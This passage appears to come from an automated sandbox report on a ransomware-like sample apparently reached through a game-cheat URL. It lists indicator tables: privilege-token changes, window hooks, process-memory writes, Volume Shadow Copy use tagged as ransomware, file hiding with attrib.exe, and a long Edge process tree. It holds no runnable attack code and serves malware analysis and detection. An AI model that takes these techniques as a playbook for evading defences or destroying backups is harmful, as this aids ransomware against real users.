1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	592	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	592	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	4212	WMIC.exe
Token: SeSecurityPrivilege	4212	WMIC.exe
Token: SeTakeOwnershipPrivilege	4212	WMIC.exe
Token: SeLoadDriverPrivilege	4212	WMIC.exe
Token: SeSystemProfilePrivilege	4212	WMIC.exe
Token: SeSystemtimePrivilege	4212	WMIC.exe
Token: SeProfSingleProcessPrivilege	4212	WMIC.exe
Token: SeIncBasePriorityPrivilege	4212	WMIC.exe
Token: SeCreatePagefilePrivilege	4212	WMIC.exe
Token: SeBackupPrivilege	4212	WMIC.exe
Token: SeRestorePrivilege	4212	WMIC.exe
Token: SeShutdownPrivilege	4212	WMIC.exe
Token: SeDebugPrivilege	4212	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4212	WMIC.exe
Token: SeRemoteShutdownPrivilege	4212	WMIC.exe
Token: SeUndockPrivilege	4212	WMIC.exe
Token: SeManageVolumePrivilege	4212	WMIC.exe
Token: 33	4212	WMIC.exe
Token: 34	4212	WMIC.exe
Token: 35	4212	WMIC.exe
Token: 36	4212	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4212	WMIC.exe
Token: SeSecurityPrivilege	4212	WMIC.exe
Token: SeTakeOwnershipPrivilege	4212	WMIC.exe
Token: SeLoadDriverPrivilege	4212	WMIC.exe
Token: SeSystemProfilePrivilege	4212	WMIC.exe
Token: SeSystemtimePrivilege	4212	WMIC.exe
Token: SeProfSingleProcessPrivilege	4212	WMIC.exe
Token: SeIncBasePriorityPrivilege	4212	WMIC.exe
Token: SeCreatePagefilePrivilege	4212	WMIC.exe
Token: SeBackupPrivilege	4212	WMIC.exe
Token: SeRestorePrivilege	4212	WMIC.exe
Token: SeShutdownPrivilege	4212	WMIC.exe
Token: SeDebugPrivilege	4212	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4212	WMIC.exe
Token: SeRemoteShutdownPrivilege	4212	WMIC.exe
Token: SeUndockPrivilege	4212	WMIC.exe
Token: SeManageVolumePrivilege	4212	WMIC.exe
Token: 33	4212	WMIC.exe
Token: 34	4212	WMIC.exe
Token: 35	4212	WMIC.exe
Token: 36	4212	WMIC.exe
Token: SeBackupPrivilege	4512	vssvc.exe
Token: SeRestorePrivilege	4512	vssvc.exe
Token: SeAuditPrivilege	4512	vssvc.exe
Token: SeTcbPrivilege	5948	taskse.exe
Token: SeTcbPrivilege	5948	taskse.exe
Token: SeTcbPrivilege	1888	taskse.exe
Token: SeTcbPrivilege	1888	taskse.exe
Token: SeTcbPrivilege	3760	taskse.exe
Token: SeTcbPrivilege	3760	taskse.exe
Token: SeTcbPrivilege	4200	taskse.exe
Token: SeTcbPrivilege	4200	taskse.exe
Token: SeTcbPrivilege	2840	taskse.exe
Token: SeTcbPrivilege	2840	taskse.exe
Token: SeTcbPrivilege	5132	taskse.exe
Token: SeTcbPrivilege	5132	taskse.exe
Token: SeTcbPrivilege	3632	taskse.exe
Token: SeTcbPrivilege	3632	taskse.exe
Token: SeTcbPrivilege	2096	taskse.exe
Token: SeTcbPrivilege	2096	taskse.exe
Token: SeTcbPrivilege	4324	taskse.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe

Suspicious use of SendNotifyMessage 25 IoCs

pid	Process
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe

Suspicious use of SetWindowsHookEx 29 IoCs

pid	Process
4160	@[email protected]
2980	@[email protected]
4160	@[email protected]
2980	@[email protected]
3008	@[email protected]
3008	@[email protected]
2800	@[email protected]
2892	@[email protected]
1856	@[email protected]
1696	@[email protected]
4068	@[email protected]
572	@[email protected]
228	@[email protected]
2664	@[email protected]
3020	@[email protected]
980	@[email protected]
3624	@[email protected]
6304	@[email protected]
6764	@[email protected]
5156	@[email protected]
6440	@[email protected]
4580	@[email protected]
6384	@[email protected]
6288	@[email protected]
7096	@[email protected]
248	@[email protected]
2992	@[email protected]
6152	@[email protected]
6836	@[email protected]

Suspicious use of UnmapMainImage 6 IoCs

pid	Process
3336	RobloxPlayerBeta.exe
6976	RobloxPlayerBeta.exe
6352	RobloxPlayerBeta.exe
6588	RobloxPlayerBeta.exe
4012	RobloxPlayerBeta.exe
2120	RobloxPlayerBeta.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4100 wrote to memory of 3292	4100	msedge.exe	81
PID 4100 wrote to memory of 3292	4100	msedge.exe	81
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 3032	4100	msedge.exe	83
PID 4100 wrote to memory of 2412	4100	msedge.exe	84
PID 4100 wrote to memory of 2412	4100	msedge.exe	84
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85
PID 4100 wrote to memory of 2152	4100	msedge.exe	85

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
440	attrib.exe
5992	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://skycheat
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa5ca33cb8,0x7ffa5ca33cc8,0x7ffa5ca33cd8
  2⤵
  PID:3292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
  2⤵
  PID:3032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8
  2⤵
  PID:2152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
  2⤵
  PID:3340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
  2⤵
  PID:3544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:1
  2⤵
  PID:3280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
  2⤵
  PID:1668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
  2⤵
  PID:5936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:3660
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5716 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5168 /prefetch:8
  2⤵
  PID:2460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5348 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
  2⤵
  PID:5532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1260 /prefetch:1
  2⤵
  PID:5876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1648 /prefetch:1
  2⤵
  PID:72
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
  2⤵
  PID:336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
  2⤵
  PID:5780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
  2⤵
  PID:3128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
  2⤵
  PID:3568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2652 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:1
  2⤵
  PID:3372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
  2⤵
  PID:5872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
  2⤵
  PID:436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6636 /prefetch:1
  2⤵
  PID:576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:1
  2⤵
  PID:660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1
  2⤵
  PID:1788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:1
  2⤵
  PID:2044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1904 /prefetch:8
  2⤵
  PID:1720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
  2⤵
  PID:5560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6828 /prefetch:1
  2⤵
  PID:3288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2596 /prefetch:1
  2⤵
  PID:2464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7316 /prefetch:1
  2⤵
  PID:3172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7276 /prefetch:1
  2⤵
  PID:2812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7280 /prefetch:1
  2⤵
  PID:4716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1
  2⤵
  PID:3764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
  2⤵
  PID:1500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,11050834321983491109,8722937629355414024,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:1
  2⤵
  PID:3512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
